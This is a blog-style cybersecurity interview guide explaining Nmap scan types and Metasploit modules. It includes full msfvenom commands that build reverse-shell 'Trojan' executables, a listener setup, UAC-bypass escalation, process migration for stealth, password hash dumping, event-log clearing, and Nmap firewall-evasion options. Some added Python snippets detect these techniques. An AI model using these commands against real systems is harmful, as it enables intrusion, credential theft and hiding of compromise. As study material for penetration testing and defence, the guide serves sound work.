[Common commands for Nmap and Metasploit]


Preface

Cybersecurity interview questions


Topic


1. Principles and common parameters of the Nmap tool

Nmap can detect whether a target host is online, which ports are open, the type and version of the services running on them, the operating system and device type, and other information.

Principle:
Nmap is an open source, free network discovery and security auditing tool for Linux. It uses raw IP packets to discover which hosts are on the network, what services (application names and versions) those hosts provide, what operating systems the services run on, what types of packet filters/firewalls are in use, and other characteristics.

First, let's introduce the six states of a port:
⚫open: the port is open
⚫closed: the port is closed
⚫filtered: the port is blocked by a firewall or IDS/IPS, so its state cannot be determined
⚫unfiltered: the port is not blocked, but whether it is open still has to be determined
⚫open|filtered: the port is either open or blocked
⚫closed|filtered: the port is either closed or blocked

Commonly used parameters and what they do:

-sP/-sn: ping scan (no port scan)
-p: specify the target ports to scan
-sT/-sS/-sA: TCP connect / TCP SYN / TCP ACK scan
-sU: UDP scan
-O: operating system detection
-sV: service/application version detection
-Pn: treat all specified hosts as up and skip host discovery
--dns-servers <serv1[,serv2],...>: specify DNS servers
--system-dns: use the system's DNS resolver
--traceroute: trace the path to each host
--packet-trace: show every packet sent and received
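As an added example (not part of the original post), the following Python parses the XML that nmap writes with -oX, the machine-readable form of the port states and -sV results described above, and compares the open ports against an allow-list, which is the defensive use of the same scan. The XML sample, the host 10.0.0.10 and the allow-list are constructed for the example.

```python
import xml.etree.ElementTree as ET

# Constructed sample of nmap's -oX output for a single host (not a real scan result).
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -sV -p 22,80,443,3306 10.0.0.10" version="7.94">
<host>
  <status state="up" reason="arp-response"/>
  <address addr="10.0.0.10" addrtype="ipv4"/>
  <ports>
    <port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/>
      <service name="ssh" product="OpenSSH" version="8.9p1"/></port>
    <port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/>
      <service name="http" product="nginx" version="1.18.0"/></port>
    <port protocol="tcp" portid="443"><state state="filtered" reason="no-response"/></port>
    <port protocol="tcp" portid="3306"><state state="closed" reason="reset"/></port>
  </ports>
</host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Flatten nmap XML into one dict per (host, port), keeping state, reason and -sV fields."""
    root = ET.fromstring(xml_text)
    rows = []
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue  # skip hosts without an IPv4 address record
        for port in host.iter("port"):
            state = port.find("state")
            svc = port.find("service")  # only present when nmap identified a service
            rows.append({
                "host": addr_el.get("addr"),
                "proto": port.get("protocol"),
                "port": int(port.get("portid")),
                "state": state.get("state"),    # open / closed / filtered / ...
                "reason": state.get("reason"),  # why nmap decided so, e.g. syn-ack, reset
                "service": svc.get("name") if svc is not None else None,
                "product": svc.get("product") if svc is not None else None,
                "version": svc.get("version") if svc is not None else None,
            })
    return rows


def open_services(rows):
    """Only the ports nmap reported as open."""
    return [r for r in rows if r["state"] == "open"]


def unexpected_open_ports(rows, allowed):
    """Open (host, port) pairs that are not in the allow-list baseline."""
    return sorted((r["host"], r["port"]) for r in open_services(rows)
                  if (r["host"], r["port"]) not in allowed)


if __name__ == "__main__":
    # Constructed baseline: only SSH is supposed to be exposed on this host.
    baseline = {("10.0.0.10", 22)}
    rows = parse_nmap_xml(SAMPLE_XML)
    for r in rows:
        print(f'{r["host"]}:{r["port"]}/{r["proto"]} {r["state"]} ({r["reason"]}) '
              f'{r["service"] or ""} {r["product"] or ""} {r["version"] or ""}'.rstrip())
    print("unexpected open ports:", unexpected_open_ports(rows, baseline))
```

The `reason` attribute is worth keeping: it records the packet that led nmap to each state (syn-ack for open, reset for closed, no-response for filtered), which is exactly the distinction the port-state list above draws.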

TCP SYN scan principle:

nmap -p 80 -sS [target IP]

Nmap sends a TCP SYN packet to the target port. If the target returns TCP SYN+ACK, the port is open; Nmap then sends a TCP RST to the target to tear the connection down. If the target returns TCP RST+ACK, the port is closed.
(Schematic diagram of the exchange omitted.)

TCP connect scan principle:

nmap -p 80 -sT [target IP]

Nmap sends a TCP SYN packet to the target port. If the target returns TCP SYN+ACK, the port is open; Nmap then sends TCP ACK and TCP RST+ACK in sequence, completing the three-way handshake and then resetting the connection. If the target returns TCP RST+ACK, the port is closed.

TCP ACK scan principle:

nmap -p 80 -sA [target IP]

Nmap sends a TCP ACK packet to the target port. Whether or not the port is open, the target returns a TCP RST. If the Nmap host receives that TCP RST, the port is not blocked by a firewall.
A TCP ACK scan can only determine whether a firewall filters a given port; it complements a TCP SYN scan when mapping the target host's firewall rules.
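The three exchanges above differ in what they leave behind: a SYN scan never completes the handshake, so the target's application never sees a connection and only packet or firewall logs record it; a connect scan completes the handshake and shows up in application logs as well; an ACK probe is an unsolicited ACK answered by RST. The following Python (an added example, not from the original post) classifies flows from a constructed packet log into those patterns and flags a client that probes several ports. The log format, the IP addresses and the threshold are assumptions made for the example.

```python
from collections import defaultdict

# Constructed packet log (not from a real capture). Fields:
#   client server port direction flags
# "port" is always the server-side port; direction ">" is client->server,
# "<" is server->client; flags use S=SYN, A=ACK, R=RST (so "SA" is SYN+ACK).
# 10.0.0.5 probes 10.0.0.10 the way each scan type above would;
# 10.0.0.7 is an ordinary client completing a handshake to port 443.
SAMPLE_LOG = """\
10.0.0.5 10.0.0.10 80 > S
10.0.0.5 10.0.0.10 80 < SA
10.0.0.5 10.0.0.10 80 > R
10.0.0.5 10.0.0.10 443 > S
10.0.0.5 10.0.0.10 443 < SA
10.0.0.5 10.0.0.10 443 > A
10.0.0.5 10.0.0.10 443 > RA
10.0.0.5 10.0.0.10 8080 > S
10.0.0.5 10.0.0.10 8080 < RA
10.0.0.5 10.0.0.10 3389 > S
10.0.0.5 10.0.0.10 22 > A
10.0.0.5 10.0.0.10 22 < R
10.0.0.7 10.0.0.10 443 > S
10.0.0.7 10.0.0.10 443 < SA
10.0.0.7 10.0.0.10 443 > A
"""

# Flow patterns that look like probes rather than real client traffic.
PROBE_KINDS = {"half-open", "closed", "no-reply", "ack-probe"}


def classify_flow(events):
    """events: [(direction, flags), ...] in time order for one (client, server, port)."""
    first = events[0]
    if first == (">", "A"):
        return "ack-probe"   # unsolicited ACK: the -sA firewall-mapping probe
    if first != (">", "S"):
        return "other"
    if len(events) > 1 and events[1] == ("<", "RA"):
        return "closed"      # SYN answered by RST+ACK: closed port
    got_synack = any(d == "<" and f == "SA" for d, f in events)
    if not got_synack:
        return "no-reply"    # no answer at all: what nmap reports as filtered
    client_follow = [f for d, f in events[1:] if d == ">"]
    if client_follow and client_follow[0] == "R":
        return "half-open"   # SYN, SYN+ACK, RST: the -sS pattern, handshake never completed
    if client_follow and client_follow[0] == "A":
        return "connect"     # full handshake: -sT or a genuine client
    return "other"


def summarize(log_text):
    """Per client, count flows of each kind (one flow per distinct server port)."""
    flows = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        client, server, port, direction, flags = line.split()
        flows[(client, server, int(port))].append((direction, flags))
    per_client = defaultdict(lambda: defaultdict(int))
    for (client, _server, _port), events in flows.items():
        per_client[client][classify_flow(events)] += 1
    return {c: dict(kinds) for c, kinds in per_client.items()}


def suspected_scanners(summary, threshold=3):
    """Clients whose probe-like flows to distinct ports reach the threshold (assumed value)."""
    return sorted(c for c, kinds in summary.items()
                  if sum(n for k, n in kinds.items() if k in PROBE_KINDS) >= threshold)


if __name__ == "__main__":
    summary = summarize(SAMPLE_LOG)
    for client, kinds in summary.items():
        print(client, kinds)
    print("suspected scanners:", suspected_scanners(summary))
```

Note that only the "connect" flows would ever reach a web server's access log or an SSH daemon's auth log; the half-open, no-reply and ACK-probe flows are visible solely at the packet or firewall layer, which is why a SYN scan is quieter than a connect scan from the application's point of view.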

Other functions:
Firewall/IDS evasion options
-T(0-5): control the scan timing (0 = slowest, 5 = fastest)

nmap -T 3 x.x.x.x

-D: decoy scan (source IP spoofing; the probes appear to come from additional fake IPs)

nmap -D RND:3 x.x.x.x            scan using three random decoy IPs

-sI: idle scan; uses an idle host on the same network segment as the apparent source (source IP spoofing)

nmap -sI <idle host IP> x.x.x.x

--source-port: source port spoofing
--spoof-mac: source MAC spoofing

nmap --spoof-mac 0 x.x.x.x                     scan with a random MAC
nmap --spoof-mac aa:bb:cc:dd:ff:ee x.x.x.x     scan with the specified MAC

Nmap can also run NSE scripts.
Script directory: /usr/share/nmap/scripts/
Parameter: --script
--script vuln: scan for common vulnerabilities

nmap --script vuln x.x.x.x

--script brute: simple brute-force login attempts against database, SMB and SNMP services

nmap --script brute x.x.x.x

2. Commonly used modules and commands of Metasploit

➢exploits (penetration attack / vulnerability exploitation modules)
⚫An exploit module is a code component that uses a discovered security vulnerability or configuration weakness to attack a remote target, implant and run an attack payload, and obtain access to the remote system. Common exploitation techniques include buffer overflows, web application vulnerability attacks and user configuration errors. The modules include proof-of-concept (POC) programs written by attackers or testers for specific vulnerabilities as well as attack code intended to compromise system security; each vulnerability has its corresponding exploit code.
⚫The exploit module is the core functional component of the Metasploit framework.

➢payloads (attack payload modules)
⚫The payload is the code we want the target system to run once it has been compromised; after a successful exploit it is used to run arbitrary commands or execute specific code on the target.
⚫Payload modules range from the simplest (adding a user account, or providing a command-line shell) through graphical VNC control to the most complex, Meterpreter, with a large set of post-exploitation features. After choosing the exploit code, the tester picks a preferred module from the many applicable payloads, assembles them flexibly, and obtains the kind of control session they want after the exploit succeeds. This modular design and flexible assembly are a great convenience for penetration testers.

➢auxiliary (auxiliary modules)
⚫These modules do not directly establish access between the tester and the target host. They only perform scanning, sniffing, fingerprinting and similar supporting functions for the penetration test: host discovery scanning, web directory scanning, FTP login password brute forcing, and so on.

For example, a port scan:

search portscan
use 5 // the TCP scan module (index taken from the search results)
show options
set RHOSTS x.x.x.x // target IP address(es) to scan
set PORTS 1-500 // port range to scan
set THREADS 20 // number of scan threads; more threads means a faster scan
run

➢nops (NOP modules)
⚫No-operation instructions (NOPs) are instructions with no effect, or irrelevant ones, that do not substantially change the running state of the program. The most typical is the no-op itself, whose opcode on the x86 CPU architecture is 0x90.
⚫When building a malicious data buffer for an exploit it is often necessary to place a NOP region before the shellcode that actually executes. That way, when the exploit triggers and the shellcode runs, there is a larger safe "landing zone", avoiding shellcode execution failures caused by memory address randomization, return-address calculation errors and the like.
⚫The NOP module in the Metasploit framework is the component that adds such a NOP region to the payload to improve the reliability of the attack.

➢encoders (encoder modules)
⚫By encoding the payload in various forms, the encoder module accomplishes two main tasks: first, making sure the payload contains none of the "bad characters" that must be avoided during the exploit; second, evading detection and blocking of the payload by anti-virus software and IDS/IPS.
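As an added example (not code from the original post or from Metasploit), the following Python shows what these two modules deal with, seen from an analyst's side: a crude IDS-style check for the long 0x90 run that a plain NOP region leaves in a buffer, and a scan for the "bad characters" (assumed here to be NUL, LF and CR, the usual string-terminator set) that an encoder must eliminate. The byte buffers are constructed for the example; none of them is a real payload.

```python
NOP = 0x90  # the x86 single-byte NOP opcode mentioned in the text


def longest_nop_run(buf: bytes, nop: int = NOP) -> int:
    """Length of the longest run of consecutive NOP bytes in buf."""
    best = run = 0
    for b in buf:
        run = run + 1 if b == nop else 0
        best = max(best, run)
    return best


def looks_like_nop_sled(buf: bytes, min_run: int = 32) -> bool:
    """Crude IDS-style signature: a long run of 0x90 is the classic NOP-region indicator.
    The 32-byte threshold is an assumption for the example; encoders exist precisely
    to break such simple signatures."""
    return longest_nop_run(buf) >= min_run


def find_bad_chars(buf: bytes, bad: bytes = b"\x00\x0a\x0d") -> dict:
    """Map each bad byte value found in buf to the offsets where it occurs.
    An encoder's first job is to make this come back empty for the chosen bad set."""
    hits = {}
    for i, b in enumerate(buf):
        if b in bad:
            hits.setdefault(b, []).append(i)
    return hits


# Constructed buffers (not real payloads): a 64-byte NOP run with filler around it,
# a buffer containing neither NOPs nor bad bytes, and a short one with NUL, LF and CR.
SLED_BUFFER = b"A" * 16 + b"\x90" * 64 + b"\xcc\xcc\xcc"
CLEAN_BUFFER = bytes(range(1, 10)) + bytes(range(14, 60))
BYTES_WITH_BAD = b"\x31\xc0\x00\x50\x0a\x0d"


if __name__ == "__main__":
    print("longest NOP run:", longest_nop_run(SLED_BUFFER))
    print("sled signature fires:", looks_like_nop_sled(SLED_BUFFER), looks_like_nop_sled(CLEAN_BUFFER))
    print("bad chars:", {hex(k): v for k, v in find_bad_chars(BYTES_WITH_BAD).items()})
```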

➢post (post-exploitation modules)
⚫Post-exploitation modules are used, once the exploit has obtained remote control of the target, to carry out follow-up actions inside the controlled system, such as collecting sensitive information, further lateral movement, and pivoting (springboard) attacks.

Meterpreter common commands

➢pwd   //show the current working directory
➢sysinfo  //show system information
➢getuid   //show the user the current session is running as
➢ps   //list the processes and PIDs running on the target
➢kill  2768 //kill the process with PID 2768
➢getsystem  //attempt to obtain SYSTEM privileges
➢screenshot //capture the target host's current screen
➢hashdump   //dump user names and password hashes
➢shell   //get a shell on the target host
➢upload  //upload a file
➢download  //download a file
➢execute   //run a file on the target system (-f file to run, -i interactive mode, -H hidden window)
➢clearev   //clear the event logs
➢background  //put Meterpreter in the background (use sessions -i to reconnect to the session)

Commonly used commands:
➢Commonly used commands in the terminal

⚫msfdb  init    //initialize the msf database
⚫msfdb  delete   //delete the msf database and stop using it
⚫msfdb  start   //start the msf database
⚫msfdb  stop   //stop the msf database
⚫msfconsole    //open the msf console

➢Commonly used commands in the msf console

⚫db_status  //show the msf database connection status
⚫db_nmap    //run nmap and store the results in the database
⚫search    //search for modules containing a keyword
⚫use    //select a module
⚫show payloads    //list the payloads supported by the module
⚫show options    //show the options the module needs set
⚫info    //show detailed module information
⚫set    //after selecting a module, set the value of an option it needs (unset clears a value)
⚫back    //return to the previous context
⚫exploit/run    //both commands run the selected module
⚫sessions //list the currently connected sessions

When an exploit module has delivered a Meterpreter session,
escalate privileges manually:
put the session in the background and use local_exploit_suggester to look up applicable local exploits.

background
use post/multi/recon/local_exploit_suggester
show options
set SESSION 4
run

bypassuac (User Account Control bypass) privilege escalation:

search bypassuac
use exploit/windows/local/bypassuac
set payload windows/x64/meterpreter/reverse_tcp
set SESSION 4
run

Process migration:
When a Meterpreter shell is first obtained it is extremely fragile and easily lost. For example, an attacker may compromise the target through a browser vulnerability, but the user may close the browser after the exploit has landed. So the first step is to move the shell and bind it to a stable process on the target machine, without writing anything to disk. Doing so also makes the intrusion harder to detect.
Running the automatic migration command (run post/windows/manage/migrate) makes the framework find a suitable process and migrate into it automatically.

run post/windows/manage/migrate
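Two of the Meterpreter actions above leave characteristic traces in Windows event logs: clearev produces Security event 1102 ("The audit log was cleared") and System event 104 ("The System log file was cleared"), and migrating into another process creates a remote thread, which Sysmon records as Event ID 8 (CreateRemoteThread). The following Python, an added example that is not part of the original post, runs two detection rules over constructed event records covering both the clearev entry in the command list and the migration step here; the record layout, the host and image paths, and the trusted-path allow-list are assumptions for the example.

```python
# Constructed Windows event records (not from a real host), reduced to the fields the
# rules need. Channel/event-id pairs used:
#   Security 1102  "The audit log was cleared"
#   System    104  "The System log file was cleared"
#   Sysmon      8  CreateRemoteThread (what process injection / migration leaves behind)
SAMPLE_EVENTS = [
    {"channel": "Security", "event_id": 4624, "host": "ws01", "user": "jdoe"},
    {"channel": "Security", "event_id": 1102, "host": "ws01", "user": "jdoe"},
    {"channel": "System", "event_id": 104, "host": "ws01", "user": "jdoe"},
    {"channel": "Microsoft-Windows-Sysmon/Operational", "event_id": 8, "host": "ws01",
     "source_image": r"C:\Users\jdoe\AppData\Local\Temp\shell.exe",
     "target_image": r"C:\Windows\explorer.exe"},
    {"channel": "Microsoft-Windows-Sysmon/Operational", "event_id": 8, "host": "ws01",
     "source_image": r"C:\Windows\System32\csrss.exe",
     "target_image": r"C:\Windows\System32\svchost.exe"},
]

LOG_CLEARED = {("Security", 1102), ("System", 104)}

# Assumed allow-list: remote threads created from these locations are treated as benign
# (csrss.exe and other system components do this legitimately). Tune per environment.
TRUSTED_PREFIXES = ("c:\\windows\\system32\\", "c:\\program files\\")


def detect_log_clearing(events):
    """Rule 1: any record meaning an event log was cleared."""
    return [{"host": e["host"], "rule": "event-log-cleared",
             "channel": e["channel"], "user": e.get("user")}
            for e in events if (e["channel"], e["event_id"]) in LOG_CLEARED]


def detect_remote_thread(events, trusted=TRUSTED_PREFIXES):
    """Rule 2: Sysmon CreateRemoteThread where the source image is outside trusted paths."""
    alerts = []
    for e in events:
        if e["channel"].endswith("Sysmon/Operational") and e["event_id"] == 8:
            src = e["source_image"].lower()
            if not src.startswith(trusted):
                alerts.append({"host": e["host"], "rule": "remote-thread-from-untrusted-path",
                               "source": e["source_image"], "target": e["target_image"]})
    return alerts


def run_rules(events):
    """Run both rules and return the combined alert list."""
    return detect_log_clearing(events) + detect_remote_thread(events)


if __name__ == "__main__":
    for alert in run_rules(SAMPLE_EVENTS):
        print(alert)
```

The log-clearing rule is the more reliable of the two: clearing a log cannot suppress the record that the log was cleared, and forwarding events to a central collector keeps a copy the target host can no longer remove.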

Generating a Trojan with msfvenom and listening for it to connect back:
Trojan generation:
Windows 64-bit:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxx -f exe > shell.exe

Windows 32-bit:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxx -a x86 --platform Windows -f exe > shell.exe

Linux:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxx -f elf > shell.elf

macOS:

msfvenom -p osx/x86/shell_reverse_tcp LHOST=x.x.x.x LPORT=xxx -f macho > shell.macho

Upload the Trojan to the target host, then start the listener:
#msfconsole
use exploit/multi/handler //load the handler module
set payload android/meterpreter/reverse_tcp //select the payload; it must match the one passed to msfvenom (the original uses the Android payload as its example)
show options //view the option settings
set LHOST xxxx //the IP address the Trojan was generated with (the Kali host's IP)
set LPORT xxx //the port the Trojan was generated with
exploit //start the listener and wait for the session to connect back

➢evasion (evasion modules)
⚫The evasion modules are mainly used to get past checks by Windows Defender Firewall, the Windows application control policy (AppLocker), and similar controls.

The general process of using Metasploit for penetration testing:
1. Scan the target system to find usable vulnerabilities
2. Select and configure an exploit module (exploits)
3. Select and configure a payload module (payloads)
4. Choose an encoding technique (encoders) to bypass anti-virus detection
5. Carry out the post-exploitation phase of the attack


Summary

This post mainly introduced the basics of Nmap and Metasploit.


Origin blog.csdn.net/qq_61872115/article/details/126109108